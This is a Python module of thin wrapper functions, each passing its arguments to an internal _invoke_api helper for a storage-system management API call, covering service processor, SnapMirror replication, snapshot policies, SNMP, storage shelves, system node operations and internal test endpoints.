def service_processor_auto_configuration_get(*args):
api_call = _invoke_api('service-processor-auto-configuration-get', *args)
return api_call
def service_processor_get(*args):
api_call = _invoke_api('service-processor-get', *args)
return api_call
def service_processor_get_iter(*args):
api_call = _invoke_api('service-processor-get-iter', *args)
return api_call
def service_processor_image_get(*args):
api_call = _invoke_api('service-processor-image-get', *args)
return api_call
def service_processor_image_modify(*args):
api_call = _invoke_api('service-processor-image-modify', *args)
return api_call
def service_processor_image_update(*args):
api_call = _invoke_api('service-processor-image-update', *args)
return api_call
def service_processor_image_update_progress_get(*args):
api_call = _invoke_api('service-processor-image-update-progress-get', *args)
return api_call
def service_processor_log_allocation_get(*args):
api_call = _invoke_api('service-processor-log-allocation-get', *args)
return api_call
def service_processor_log_allocation_get_iter(*args):
api_call = _invoke_api('service-processor-log-allocation-get-iter', *args)
return api_call
def service_processor_network_get(*args):
api_call = _invoke_api('service-processor-network-get', *args)
return api_call
def service_processor_network_get_iter(*args):
api_call = _invoke_api('service-processor-network-get-iter', *args)
return api_call
def service_processor_network_modify(*args):
api_call = _invoke_api('service-processor-network-modify', *args)
return api_call
def service_processor_network_modify_iter(*args):
api_call = _invoke_api('service-processor-network-modify-iter', *args)
return api_call
def service_processor_reboot(*args):
api_call = _invoke_api('service-processor-reboot', *args)
return api_call
def service_processor_ssh_add_allowed_addresses(*args):
api_call = _invoke_api('service-processor-ssh-add-allowed-addresses', *args)
return api_call
def service_processor_ssh_get(*args):
api_call = _invoke_api('service-processor-ssh-get', *args)
return api_call
def service_processor_ssh_remove_allowed_addresses(*args):
api_call = _invoke_api('service-processor-ssh-remove-allowed-addresses', *args)
return api_call
def sis_get_iter(*args):
api_call = _invoke_api('sis-get-iter', *args)
return api_call
def sis_policy_get_iter(*args):
api_call = _invoke_api('sis-policy-get-iter', *args)
return api_call
def sis_prepare_to_downgrade(*args):
api_call = _invoke_api('sis-prepare-to-downgrade', *args)
return api_call
def sis_status(*args):
api_call = _invoke_api('sis-status', *args)
return api_call
def snapmirror_abort(*args):
api_call = _invoke_api('snapmirror-abort', *args)
return api_call
def snapmirror_abort_async(*args):
api_call = _invoke_api('snapmirror-abort-async', *args)
return api_call
def snapmirror_abort_iter(*args):
api_call = _invoke_api('snapmirror-abort-iter', *args)
return api_call
def snapmirror_break(*args):
api_call = _invoke_api('snapmirror-break', *args)
return api_call
def snapmirror_break_async(*args):
api_call = _invoke_api('snapmirror-break-async', *args)
return api_call
def snapmirror_break_iter(*args):
api_call = _invoke_api('snapmirror-break-iter', *args)
return api_call
def snapmirror_cache_rebuild_relationship(*args):
api_call = _invoke_api('snapmirror-cache-rebuild-relationship', *args)
return api_call
def snapmirror_check(*args):
api_call = _invoke_api('snapmirror-check', *args)
return api_call
def snapmirror_check_iter(*args):
api_call = _invoke_api('snapmirror-check-iter', *args)
return api_call
def snapmirror_config_replication_cluster_storage_configuration_get(*args):
api_call = _invoke_api('snapmirror-config-replication-cluster-storage-configuration-get', *args)
return api_call
def snapmirror_config_replication_cluster_storage_configuration_modify(*args):
api_call = _invoke_api('snapmirror-config-replication-cluster-storage-configuration-modify', *args)
return api_call
def snapmirror_cr_status_aggregate_eligibility_get(*args):
api_call = _invoke_api('snapmirror-cr-status-aggregate-eligibility-get', *args)
return api_call
def snapmirror_cr_status_aggregate_eligibility_get_iter(*args):
api_call = _invoke_api('snapmirror-cr-status-aggregate-eligibility-get-iter', *args)
return api_call
def snapmirror_cr_status_comm_get(*args):
api_call = _invoke_api('snapmirror-cr-status-comm-get', *args)
return api_call
def snapmirror_cr_status_comm_get_iter(*args):
api_call = _invoke_api('snapmirror-cr-status-comm-get-iter', *args)
return api_call
def snapmirror_cr_status_get(*args):
api_call = _invoke_api('snapmirror-cr-status-get', *args)
return api_call
def snapmirror_create(*args):
api_call = _invoke_api('snapmirror-create', *args)
return api_call
def snapmirror_destroy(*args):
api_call = _invoke_api('snapmirror-destroy', *args)
return api_call
def snapmirror_destroy_async(*args):
api_call = _invoke_api('snapmirror-destroy-async', *args)
return api_call
def snapmirror_destroy_iter(*args):
api_call = _invoke_api('snapmirror-destroy-iter', *args)
return api_call
def snapmirror_get(*args):
api_call = _invoke_api('snapmirror-get', *args)
return api_call
def snapmirror_get_destination(*args):
api_call = _invoke_api('snapmirror-get-destination', *args)
return api_call
def snapmirror_get_destination_iter(*args):
api_call = _invoke_api('snapmirror-get-destination-iter', *args)
return api_call
def snapmirror_get_iter(*args):
api_call = _invoke_api('snapmirror-get-iter', *args)
return api_call
def snapmirror_get_total_records(*args):
api_call = _invoke_api('snapmirror-get-total-records', *args)
return api_call
def snapmirror_get_volume_status(*args):
api_call = _invoke_api('snapmirror-get-volume-status', *args)
return api_call
def snapmirror_history_get(*args):
api_call = _invoke_api('snapmirror-history-get', *args)
return api_call
def snapmirror_history_get_iter(*args):
api_call = _invoke_api('snapmirror-history-get-iter', *args)
return api_call
def snapmirror_initialize(*args):
api_call = _invoke_api('snapmirror-initialize', *args)
return api_call
def snapmirror_initialize_iter(*args):
api_call = _invoke_api('snapmirror-initialize-iter', *args)
return api_call
def snapmirror_initialize_ls_set(*args):
api_call = _invoke_api('snapmirror-initialize-ls-set', *args)
return api_call
def snapmirror_modify(*args):
api_call = _invoke_api('snapmirror-modify', *args)
return api_call
def snapmirror_modify_iter(*args):
api_call = _invoke_api('snapmirror-modify-iter', *args)
return api_call
def snapmirror_policy_get_iter(*args):
api_call = _invoke_api('snapmirror-policy-get-iter', *args)
return api_call
def snapmirror_promote(*args):
api_call = _invoke_api('snapmirror-promote', *args)
return api_call
def snapmirror_promote_iter(*args):
api_call = _invoke_api('snapmirror-promote-iter', *args)
return api_call
def snapmirror_quiesce(*args):
api_call = _invoke_api('snapmirror-quiesce', *args)
return api_call
def snapmirror_quiesce_iter(*args):
api_call = _invoke_api('snapmirror-quiesce-iter', *args)
return api_call
def snapmirror_release(*args):
api_call = _invoke_api('snapmirror-release', *args)
return api_call
def snapmirror_release_iter(*args):
api_call = _invoke_api('snapmirror-release-iter', *args)
return api_call
def snapmirror_restore(*args):
api_call = _invoke_api('snapmirror-restore', *args)
return api_call
def snapmirror_resume(*args):
api_call = _invoke_api('snapmirror-resume', *args)
return api_call
def snapmirror_resume_iter(*args):
api_call = _invoke_api('snapmirror-resume-iter', *args)
return api_call
def snapmirror_resync(*args):
api_call = _invoke_api('snapmirror-resync', *args)
return api_call
def snapmirror_resync_iter(*args):
api_call = _invoke_api('snapmirror-resync-iter', *args)
return api_call
def snapmirror_snapshot_owner_get(*args):
api_call = _invoke_api('snapmirror-snapshot-owner-get', *args)
return api_call
def snapmirror_snapshot_owner_get_snapshots(*args):
api_call = _invoke_api('snapmirror-snapshot-owner-get-snapshots', *args)
return api_call
def snapmirror_update(*args):
api_call = _invoke_api('snapmirror-update', *args)
return api_call
def snapmirror_update_iter(*args):
api_call = _invoke_api('snapmirror-update-iter', *args)
return api_call
def snapmirror_update_ls_set(*args):
api_call = _invoke_api('snapmirror-update-ls-set', *args)
return api_call
def snapshot_get_iter(*args):
api_call = _invoke_api('snapshot-get-iter', *args)
return api_call
def snapshot_modify_iter(*args):
api_call = _invoke_api('snapshot-modify-iter', *args)
return api_call
def snapshot_policy_add_schedule(*args):
api_call = _invoke_api('snapshot-policy-add-schedule', *args)
return api_call
def snapshot_policy_create(*args):
api_call = _invoke_api('snapshot-policy-create', *args)
return api_call
def snapshot_policy_delete(*args):
api_call = _invoke_api('snapshot-policy-delete', *args)
return api_call
def snapshot_policy_get(*args):
api_call = _invoke_api('snapshot-policy-get', *args)
return api_call
def snapshot_policy_get_iter(*args):
api_call = _invoke_api('snapshot-policy-get-iter', *args)
return api_call
def snapshot_policy_modify(*args):
api_call = _invoke_api('snapshot-policy-modify', *args)
return api_call
def snapshot_policy_modify_schedule(*args):
api_call = _invoke_api('snapshot-policy-modify-schedule', *args)
return api_call
def snapshot_policy_remove_schedule(*args):
api_call = _invoke_api('snapshot-policy-remove-schedule', *args)
return api_call
def snapshot_reserve_list_info(*args):
api_call = _invoke_api('snapshot-reserve-list-info', *args)
return api_call
def snmp_community_add(*args):
api_call = _invoke_api('snmp-community-add', *args)
return api_call
def snmp_community_delete(*args):
api_call = _invoke_api('snmp-community-delete', *args)
return api_call
def snmp_community_delete_all(*args):
api_call = _invoke_api('snmp-community-delete-all', *args)
return api_call
def snmp_disable(*args):
api_call = _invoke_api('snmp-disable', *args)
return api_call
def snmp_enable(*args):
api_call = _invoke_api('snmp-enable', *args)
return api_call
def snmp_get(*args):
api_call = _invoke_api('snmp-get', *args)
return api_call
def snmp_get_next(*args):
api_call = _invoke_api('snmp-get-next', *args)
return api_call
def snmp_prepare_to_downgrade(*args):
api_call = _invoke_api('snmp-prepare-to-downgrade', *args)
return api_call
def snmp_status(*args):
api_call = _invoke_api('snmp-status', *args)
return api_call
def snmp_trap_disable(*args):
api_call = _invoke_api('snmp-trap-disable', *args)
return api_call
def snmp_trap_enable(*args):
api_call = _invoke_api('snmp-trap-enable', *args)
return api_call
def snmp_traphost_add(*args):
api_call = _invoke_api('snmp-traphost-add', *args)
return api_call
def snmp_traphost_delete(*args):
api_call = _invoke_api('snmp-traphost-delete', *args)
return api_call
def ssh_prepare_to_downgrade(*args):
api_call = _invoke_api('ssh-prepare-to-downgrade', *args)
return api_call
def storage_adapter_enable_adapter(*args):
api_call = _invoke_api('storage-adapter-enable-adapter', *args)
return api_call
def storage_adapter_get_adapter_info(*args):
api_call = _invoke_api('storage-adapter-get-adapter-info', *args)
return api_call
def storage_adapter_get_adapter_list(*args):
api_call = _invoke_api('storage-adapter-get-adapter-list', *args)
return api_call
def storage_array_get_config_summary(*args):
api_call = _invoke_api('storage-array-get-config-summary', *args)
return api_call
def storage_array_list_info(*args):
api_call = _invoke_api('storage-array-list-info', *args)
return api_call
def storage_array_modify(*args):
api_call = _invoke_api('storage-array-modify', *args)
return api_call
def storage_array_port_modify(*args):
api_call = _invoke_api('storage-array-port-modify', *args)
return api_call
def storage_array_ports_list_info(*args):
api_call = _invoke_api('storage-array-ports-list-info', *args)
return api_call
def storage_array_rename(*args):
api_call = _invoke_api('storage-array-rename', *args)
return api_call
def storage_bridge_get(*args):
api_call = _invoke_api('storage-bridge-get', *args)
return api_call
def storage_bridge_get_iter(*args):
api_call = _invoke_api('storage-bridge-get-iter', *args)
return api_call
def storage_disk_get_iter(*args):
api_call = _invoke_api('storage-disk-get-iter', *args)
return api_call
def storage_disk_modify(*args):
api_call = _invoke_api('storage-disk-modify', *args)
return api_call
def storage_disk_remove_reservation(*args):
api_call = _invoke_api('storage-disk-remove-reservation', *args)
return api_call
def storage_initiator_balance(*args):
api_call = _invoke_api('storage-initiator-balance', *args)
return api_call
def storage_initiator_disk_path_list_info(*args):
api_call = _invoke_api('storage-initiator-disk-path-list-info', *args)
return api_call
def storage_initiator_errors_list_info(*args):
api_call = _invoke_api('storage-initiator-errors-list-info', *args)
return api_call
def storage_initiator_get_load(*args):
api_call = _invoke_api('storage-initiator-get-load', *args)
return api_call
def storage_initiator_path_list_info(*args):
api_call = _invoke_api('storage-initiator-path-list-info', *args)
return api_call
def storage_initiator_path_quiesce(*args):
api_call = _invoke_api('storage-initiator-path-quiesce', *args)
return api_call
def storage_initiator_path_resume(*args):
api_call = _invoke_api('storage-initiator-path-resume', *args)
return api_call
def storage_pool_add(*args):
api_call = _invoke_api('storage-pool-add', *args)
return api_call
def storage_pool_aggregate_get_iter(*args):
api_call = _invoke_api('storage-pool-aggregate-get-iter', *args)
return api_call
def storage_pool_available_capacity_get_iter(*args):
api_call = _invoke_api('storage-pool-available-capacity-get-iter', *args)
return api_call
def storage_pool_create(*args):
api_call = _invoke_api('storage-pool-create', *args)
return api_call
def storage_pool_delete(*args):
api_call = _invoke_api('storage-pool-delete', *args)
return api_call
def storage_pool_disk_get_iter(*args):
api_call = _invoke_api('storage-pool-disk-get-iter', *args)
return api_call
def storage_pool_get_iter(*args):
api_call = _invoke_api('storage-pool-get-iter', *args)
return api_call
def storage_pool_reassign(*args):
api_call = _invoke_api('storage-pool-reassign', *args)
return api_call
def storage_shelf_acp_get(*args):
api_call = _invoke_api('storage-shelf-acp-get', *args)
return api_call
def storage_shelf_acp_module_get(*args):
api_call = _invoke_api('storage-shelf-acp-module-get', *args)
return api_call
def storage_shelf_acp_module_get_iter(*args):
api_call = _invoke_api('storage-shelf-acp-module-get-iter', *args)
return api_call
def storage_shelf_bay_list_info(*args):
api_call = _invoke_api('storage-shelf-bay-list-info', *args)
return api_call
def storage_shelf_environment_list_info(*args):
api_call = _invoke_api('storage-shelf-environment-list-info', *args)
return api_call
def storage_shelf_error_list_info(*args):
api_call = _invoke_api('storage-shelf-error-list-info', *args)
return api_call
def storage_shelf_firmware_update(*args):
api_call = _invoke_api('storage-shelf-firmware-update', *args)
return api_call
def storage_shelf_firmware_update_info_get(*args):
api_call = _invoke_api('storage-shelf-firmware-update-info-get', *args)
return api_call
def storage_shelf_firmware_update_info_get_iter(*args):
api_call = _invoke_api('storage-shelf-firmware-update-info-get-iter', *args)
return api_call
def storage_shelf_get_shelf_info(*args):
api_call = _invoke_api('storage-shelf-get-shelf-info', *args)
return api_call
def storage_shelf_info_get(*args):
api_call = _invoke_api('storage-shelf-info-get', *args)
return api_call
def storage_shelf_info_get_iter(*args):
api_call = _invoke_api('storage-shelf-info-get-iter', *args)
return api_call
def storage_shelf_list_info(*args):
api_call = _invoke_api('storage-shelf-list-info', *args)
return api_call
def storage_shelf_storage_acp_configure(*args):
api_call = _invoke_api('storage-shelf-storage-acp-configure', *args)
return api_call
def storage_switch_get(*args):
api_call = _invoke_api('storage-switch-get', *args)
return api_call
def storage_switch_get_iter(*args):
api_call = _invoke_api('storage-switch-get-iter', *args)
return api_call
def storage_transition_aggregates_get_iter(*args):
api_call = _invoke_api('storage-transition-aggregates-get-iter', *args)
return api_call
def storage_transition_aggregates_start(*args):
api_call = _invoke_api('storage-transition-aggregates-start', *args)
return api_call
def storage_transition_commit_get_iter(*args):
api_call = _invoke_api('storage-transition-commit-get-iter', *args)
return api_call
def storage_transition_commit_start(*args):
api_call = _invoke_api('storage-transition-commit-start', *args)
return api_call
def storage_transition_pre_commit_begin(*args):
api_call = _invoke_api('storage-transition-pre-commit-begin', *args)
return api_call
def storage_transition_pre_commit_end(*args):
api_call = _invoke_api('storage-transition-pre-commit-end', *args)
return api_call
def storage_transition_pre_commit_get(*args):
api_call = _invoke_api('storage-transition-pre-commit-get', *args)
return api_call
def storage_transition_pre_commit_get_iter(*args):
api_call = _invoke_api('storage-transition-pre-commit-get-iter', *args)
return api_call
def storage_transition_purge_info(*args):
api_call = _invoke_api('storage-transition-purge-info', *args)
return api_call
def storage_transition_revert_get_iter(*args):
api_call = _invoke_api('storage-transition-revert-get-iter', *args)
return api_call
def storage_transition_revert_start(*args):
api_call = _invoke_api('storage-transition-revert-start', *args)
return api_call
def storage_transition_volumes_get_iter(*args):
api_call = _invoke_api('storage-transition-volumes-get-iter', *args)
return api_call
def storage_transition_volumes_start(*args):
api_call = _invoke_api('storage-transition-volumes-start', *args)
return api_call
def system_api_change_get_iter(*args):
api_call = _invoke_api('system-api-change-get-iter', *args)
return api_call
def system_api_get_elements(*args):
api_call = _invoke_api('system-api-get-elements', *args)
return api_call
def system_api_list(*args):
api_call = _invoke_api('system-api-list', *args)
return api_call
def system_api_list_types(*args):
api_call = _invoke_api('system-api-list-types', *args)
return api_call
def system_cli(*args):
api_call = _invoke_api('system-cli', *args)
return api_call
def system_get_node_info_iter(*args):
api_call = _invoke_api('system-get-node-info-iter', *args)
return api_call
def system_get_ontapi_version(*args):
api_call = _invoke_api('system-get-ontapi-version', *args)
return api_call
def system_get_vendor_info(*args):
api_call = _invoke_api('system-get-vendor-info', *args)
return api_call
def system_get_version(*args):
api_call = _invoke_api('system-get-version', *args)
return api_call
def system_image_fetch_package(*args):
api_call = _invoke_api('system-image-fetch-package', *args)
return api_call
def system_image_get_iter(*args):
api_call = _invoke_api('system-image-get-iter', *args)
return api_call
def system_image_modify(*args):
api_call = _invoke_api('system-image-modify', *args)
return api_call
def system_image_package_delete(*args):
api_call = _invoke_api('system-image-package-delete', *args)
return api_call
def system_image_package_get_iter(*args):
api_call = _invoke_api('system-image-package-get-iter', *args)
return api_call
def system_image_update(*args):
api_call = _invoke_api('system-image-update', *args)
return api_call
def system_image_update_get_abort(*args):
api_call = _invoke_api('system-image-update-get-abort', *args)
return api_call
def system_image_update_progress_get(*args):
api_call = _invoke_api('system-image-update-progress-get', *args)
return api_call
def system_manager_upgrade(*args):
api_call = _invoke_api('system-manager-upgrade', *args)
return api_call
def system_node_delete_backlog_get(*args):
api_call = _invoke_api('system-node-delete-backlog-get', *args)
return api_call
def system_node_discovery_get_iter(*args):
api_call = _invoke_api('system-node-discovery-get-iter', *args)
return api_call
def system_node_get(*args):
api_call = _invoke_api('system-node-get', *args)
return api_call
def system_node_get_iter(*args):
api_call = _invoke_api('system-node-get-iter', *args)
return api_call
def system_node_modify(*args):
api_call = _invoke_api('system-node-modify', *args)
return api_call
def system_node_power_cycle(*args):
api_call = _invoke_api('system-node-power-cycle', *args)
return api_call
def system_node_power_get(*args):
api_call = _invoke_api('system-node-power-get', *args)
return api_call
def system_node_power_off(*args):
api_call = _invoke_api('system-node-power-off', *args)
return api_call
def system_node_power_on(*args):
api_call = _invoke_api('system-node-power-on', *args)
return api_call
def system_node_reboot(*args):
api_call = _invoke_api('system-node-reboot', *args)
return api_call
def system_node_rename(*args):
api_call = _invoke_api('system-node-rename', *args)
return api_call
def system_node_reset(*args):
api_call = _invoke_api('system-node-reset', *args)
return api_call
def system_node_revert_to(*args):
api_call = _invoke_api('system-node-revert-to', *args)
return api_call
def system_node_shutdown(*args):
api_call = _invoke_api('system-node-shutdown', *args)
return api_call
def system_ontapi_limits_get(*args):
api_call = _invoke_api('system-ontapi-limits-get', *args)
return api_call
def system_ontapi_limits_set(*args):
api_call = _invoke_api('system-ontapi-limits-set', *args)
return api_call
def system_services_web_get(*args):
api_call = _invoke_api('system-services-web-get', *args)
return api_call
def system_user_capability_get_iter(*args):
api_call = _invoke_api('system-user-capability-get-iter', *args)
return api_call
def tape_mc_get(*args):
api_call = _invoke_api('tape-mc-get', *args)
return api_call
def tape_mc_get_iter(*args):
api_call = _invoke_api('tape-mc-get-iter', *args)
return api_call
def tape_mc_info_alias_clear(*args):
api_call = _invoke_api('tape-mc-info-alias-clear', *args)
return api_call
def tape_mc_info_alias_set(*args):
api_call = _invoke_api('tape-mc-info-alias-set', *args)
return api_call
def tape_mc_info_offline(*args):
api_call = _invoke_api('tape-mc-info-offline', *args)
return api_call
def tape_mc_info_online(*args):
api_call = _invoke_api('tape-mc-info-online', *args)
return api_call
def tape_mc_info_position(*args):
api_call = _invoke_api('tape-mc-info-position', *args)
return api_call
def tape_mc_info_reset(*args):
api_call = _invoke_api('tape-mc-info-reset', *args)
return api_call
def tape_mc_info_test_release(*args):
api_call = _invoke_api('tape-mc-info-test-release', *args)
return api_call
def tape_mc_info_test_reserve(*args):
api_call = _invoke_api('tape-mc-info-test-reserve', *args)
return api_call
def tape_mc_info_trace(*args):
api_call = _invoke_api('tape-mc-info-trace', *args)
return api_call
def test_intrinsic_apis_1_create(*args):
api_call = _invoke_api('test-intrinsic-apis-1-create', *args)
return api_call
def test_intrinsic_apis_1_destroy(*args):
api_call = _invoke_api('test-intrinsic-apis-1-destroy', *args)
return api_call
def test_intrinsic_apis_1_destroy_iter(*args):
api_call = _invoke_api('test-intrinsic-apis-1-destroy-iter', *args)
return api_call
def test_intrinsic_apis_1_get(*args):
api_call = _invoke_api('test-intrinsic-apis-1-get', *args)
return api_call
def test_intrinsic_apis_1_get_create_defaults(*args):
api_call = _invoke_api('test-intrinsic-apis-1-get-create-defaults', *args)
return api_call
def test_intrinsic_apis_1_get_iter(*args):
api_call = _invoke_api('test-intrinsic-apis-1-get-iter', *args)
return api_call
def test_intrinsic_apis_1_get_total_records(*args):
api_call = _invoke_api('test-intrinsic-apis-1-get-total-records', *args)
return api_call
def test_intrinsic_apis_1_list_info(*args):
api_call = _invoke_api('test-intrinsic-apis-1-list-info', *args)
return api_call
def test_intrinsic_apis_2_create(*args):
api_call = _invoke_api('test-intrinsic-apis-2-create', *args)
return api_call
def test_intrinsic_apis_2_destroy(*args):
api_call = _invoke_api('test-intrinsic-apis-2-destroy', *args)
return api_call
def test_intrinsic_apis_2_destroy_iter(*args):
api_call = _invoke_api('test-intrinsic-apis-2-destroy-iter', *args)
return api_call
def test_intrinsic_apis_2_get(*args):
api_call = _invoke_api('test-intrinsic-apis-2-get', *args)
return api_call
def test_intrinsic_apis_2_get_create_defaults(*args):
api_call = _invoke_api('test-intrinsic-apis-2-get-create-defaults', *args)
return api_call
def test_intrinsic_apis_2_get_iter(*args):
api_call = _invoke_api('test-intrinsic-apis-2-get-iter', *args)
return api_call
def test_intrinsic_apis_2_get_total_records(*args):
api_call = _invoke_api('test-intrinsic-apis-2-get-total-records', *args)
return api_call
def test_intrinsic_apis_2_list_info(*args):
api_call = _invoke_api('test-intrinsic-apis-2-list-info', *args)
return api_call
def test_intrinsic_apis_2_modify(*args):
api_call = _invoke_api('test-intrinsic-apis-2-modify', *args)
return api_call
def test_intrinsic_apis_2_modify_iter(*args):
api_call = _invoke_api('test-intrinsic-apis-2-modify-iter', *args)
return api_call
def test_intrinsic_apis_3_create(*args):
api_call = _invoke_api('test-intrinsic-apis-3-create', *args)
return api_call
def test_intrinsic_apis_3_destroy(*args):
api_call = _invoke_api('test-intrinsic-apis-3-destroy', *args)
return api_call
def test_intrinsic_apis_3_destroy_iter(*args):
api_call = _invoke_api('test-intrinsic-apis-3-destroy-iter', *args)
return api_call
def test_intrinsic_apis_3_get(*args):
api_call = _invoke_api('test-intrinsic-apis-3-get', *args)
return api_call
def test_intrinsic_apis_3_get_create_defaults(*args):
api_call = _invoke_api('test-intrinsic-apis-3-get-create-defaults', *args)
return api_call
def test_intrinsic_apis_3_get_iter(*args):
api_call = _invoke_api('test-intrinsic-apis-3-get-iter', *args)
return api_call
def test_intrinsic_apis_3_get_total_records(*args):
api_call = _invoke_api('test-intrinsic-apis-3-get-total-records', *args)
return api_call
def test_intrinsic_apis_3_list_info(*args):
api_call = _invoke_api('test-intrinsic-apis-3-list-info', *args)
return api_call
def test_intrinsic_apis_4_create(*args):
api_call = _invoke_api('test-intrinsic-apis-4-create', *args)
return api_call
def test_intrinsic_apis_4_destroy(*args):
api_call = _invoke_api('test-intrinsic-apis-4-destroy', *args)
return api_call
def test_intrinsic_apis_4_destroy_iter(*args):
api_call = _invoke_api('test-intrinsic-apis-4-destroy-iter', *args)
return api_call
def test_intrinsic_apis_4_get(*args):
api_call = _invoke_api('test-intrinsic-apis-4-get', *args)
return api_call
def test_intrinsic_apis_4_get_create_defaults(*args):
api_call = _invoke_api('test-intrinsic-apis-4-get-create-defaults', *args)
return api_call
def test_intrinsic_apis_4_get_iter(*args):
api_call = _invoke_api('test-intrinsic-apis-4-get-iter', *args)
return api_call
def test_intrinsic_apis_4_get_total_records(*args):
api_call = _invoke_api('test-intrinsic-apis-4-get-total-records', *args)
return api_call
def test_intrinsic_apis_4_list_info(*args):
api_call = _invoke_api('test-intrinsic-apis-4-list-info', *args)
return api_call
def test_key_optionality_alt_create(*args):
api_call = _invoke_api('test-key-optionality-alt-create', *args)
return api_call
def test_key_optionality_alt_destroy(*args):
api_call = _invoke_api('test-key-optionality-alt-destroy', *args)
return api_call
def test_key_optionality_alt_get(*args):
api_call = _invoke_api('test-key-optionality-alt-get', *args)
return api_call
def test_key_optionality_alt_modify(*args):
api_call = _invoke_api('test-key-optionality-alt-modify', *args)
return api_call
def test_key_optionality_create(*args):
api_call = _invoke_api('test-key-optionality-create', *args)
return api_call
def test_key_optionality_destroy(*args):
api_call = _invoke_api('test-key-optionality-destroy', *args)
return api_call
def test_key_optionality_get(*args):
api_call = _invoke_api('test-key-optionality-get', *args)
return api_call
def test_key_optionality_modify(*args):
api_call = _invoke_api('test-key-optionality-modify', *args)
return api_call
def test_memory_stats(*args):
api_call = _invoke_api('test-memory-stats', *args)
return api_call
def test_password_get(*args):
api_call = _invoke_api('test-password-get', *args)
return api_call
def test_password_set(*args):
api_call = _invoke_api('test-password-set', *args)
return api_call
def test_plug_leak(*args):
api_call = _invoke_api('test-plug-leak', *args)
return api_call
def test_ro_action_1_readonly3(*args):
api_call = _invoke_api('test-ro-action-1-readonly3', *args)
return api_call
def test_ro_action_2_readonly4(*args):
api_call = _invoke_api('test-ro-action-2-readonly4', *args)
return api_call
def test_ro_action_3_writable3(*args):
api_call = _invoke_api('test-ro-action-3-writable3', *args)
return api_call
def test_ro_method_readonly1(*args):
api_call = _invoke_api('test-ro-method-readonly1', *args)
return api_call
def test_ro_table_readonly1(*args):
api_call = _invoke_api('test-ro-table-readonly1', *args)
return api_call
def test_ro_table_writable1(*args):
api_call = _invoke_api('test-ro-table-writable1', *args)
return api_call
def test_rw_method_writable2(*args):
api_call = _invoke_api('test-rw-method-writable2', *args)
return api_call
def test_schema_validator(*args):
api_call = _invoke_api('test-schema-validator', *args)
return api_call
def test_zapi_ro_view_1_readonly6(*args):
api_call = _invoke_api('test-zapi-ro-view-1-readonly6', *args)
return api_call
def test_zapi_ro_view_1_writable4(*args):
api_call = _invoke_api('test-zapi-ro-view-1-writable4', *args)
return api_call
def test_zapi_ro_view_5_create(*args):
api_call = _invoke_api('test-zapi-ro-view-5-create', *args)
return api_call
def test_zapi_ro_view_5_destroy(*args):
api_call = _invoke_api('test-zapi-ro-view-5-destroy', *args)
return api_call
def test_zapi_ro_view_5_destroy_iter(*args):
api_call = _invoke_api('test-zapi-ro-view-5-destroy-iter', *args)
return api_call
def test_zapi_ro_view_5_get(*args):
api_call = _invoke_api('test-zapi-ro-view-5-get', *args)
return api_call
def test_zapi_ro_view_5_get_create_defaults(*args):
api_call = _invoke_api('test-zapi-ro-view-5-get-create-defaults', *args)
return api_call
def test_zapi_ro_view_5_get_iter(*args):
api_call = _invoke_api('test-zapi-ro-view-5-get-iter', *args)
return api_call
def test_zapi_ro_view_5_get_total_records(*args):
api_call = _invoke_api('test-zapi-ro-view-5-get-total-records', *args)
return api_call
def test_zapi_ro_view_5_list_info(*args):
api_call = _invoke_api('test-zapi-ro-view-5-list-info', *args)
return api_call
def test_zapi_ro_view_6_create(*args):
api_call = _invoke_api('test-zapi-ro-view-6-create', *args)
return api_call
def test_zapi_ro_view_6_destroy(*args):
api_call = _invoke_api('test-zapi-ro-view-6-destroy', *args)
return api_call
def test_zapi_ro_view_6_destroy_iter(*args):
api_call = _invoke_api('test-zapi-ro-view-6-destroy-iter', *args)
return api_call
def test_zapi_ro_view_6_get(*args):
api_call = _invoke_api('test-zapi-ro-view-6-get', *args)
return api_call
def test_zapi_ro_view_6_get_create_defaults(*args):
api_call = _invoke_api('test-zapi-ro-view-6-get-create-defaults', *args)
return api_call
def test_zapi_ro_view_6_get_iter(*args):
api_call = _invoke_api('test-zapi-ro-view-6-get-iter', *args)
return api_call
def test_zapi_ro_view_6_get_total_records(*args):
api_call = _invoke_api('test-zapi-ro-view-6-get-total-records', *args)
return api_call
def test_zapi_ro_view_6_list_info(*args):
api_call = _invoke_api('test-zapi-ro-view-6-list-info', *args)
return api_call
def test_zapi_ro_view_6_modify(*args):
api_call = _invoke_api('test-zapi-ro-view-6-modify', *args)
return api_call
def test_zapi_ro_view_6_modify_iter(*args):
api_call = _invoke_api('test-zapi-ro-view-6-modify-iter', *args)
return api_call
def test_zapi_sleep(*args):
api_call = _invoke_api('test-zapi-sleep', *args)
return api_call
def test_zapi_sleep_destroy_async_iter(*args):
api_call = _invoke_api('test-zapi-sleep-destroy-async-iter', *args)
return api_call
def test_zapi_sleep_destroy_iter(*args):
api_call = _invoke_api('test-zapi-sleep-destroy-iter', *args)
return api_call
def test_zapi_sleep_get_iter(*args):
api_call = _invoke_api('test-zapi-sleep-get-iter', *args)
return api_call
def test_zapi_sleep_method_async_iter(*args):
api_call = _invoke_api('test-zapi-sleep-method-async-iter', *args)
return api_call
def test_zapi_sleep_method_iter(*args):
api_call = _invoke_api('test-zapi-sleep-method-iter', *args)
return api_call
def test_zapi_sleep_modify_async_iter(*args):
api_call = _invoke_api('test-zapi-sleep-modify-async-iter', *args)
return api_call
def test_zapi_sleep_modify_iter(*args):
api_call = _invoke_api('test-zapi-sleep-modify-iter', *args)
return api_call
def test_zapi_smf_mapping_apis_async_create(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-async-create', *args)
return api_call
def test_zapi_smf_mapping_apis_async_destroy(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-async-destroy', *args)
return api_call
def test_zapi_smf_mapping_apis_async_destroy_iter(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-async-destroy-iter', *args)
return api_call
def test_zapi_smf_mapping_apis_async_get(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-async-get', *args)
return api_call
def test_zapi_smf_mapping_apis_async_get_create_defaults(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-async-get-create-defaults', *args)
return api_call
def test_zapi_smf_mapping_apis_async_get_iter(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-async-get-iter', *args)
return api_call
def test_zapi_smf_mapping_apis_async_get_total_records(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-async-get-total-records', *args)
return api_call
def test_zapi_smf_mapping_apis_async_list_info(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-async-list-info', *args)
return api_call
def test_zapi_smf_mapping_apis_async_modify(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-async-modify', *args)
return api_call
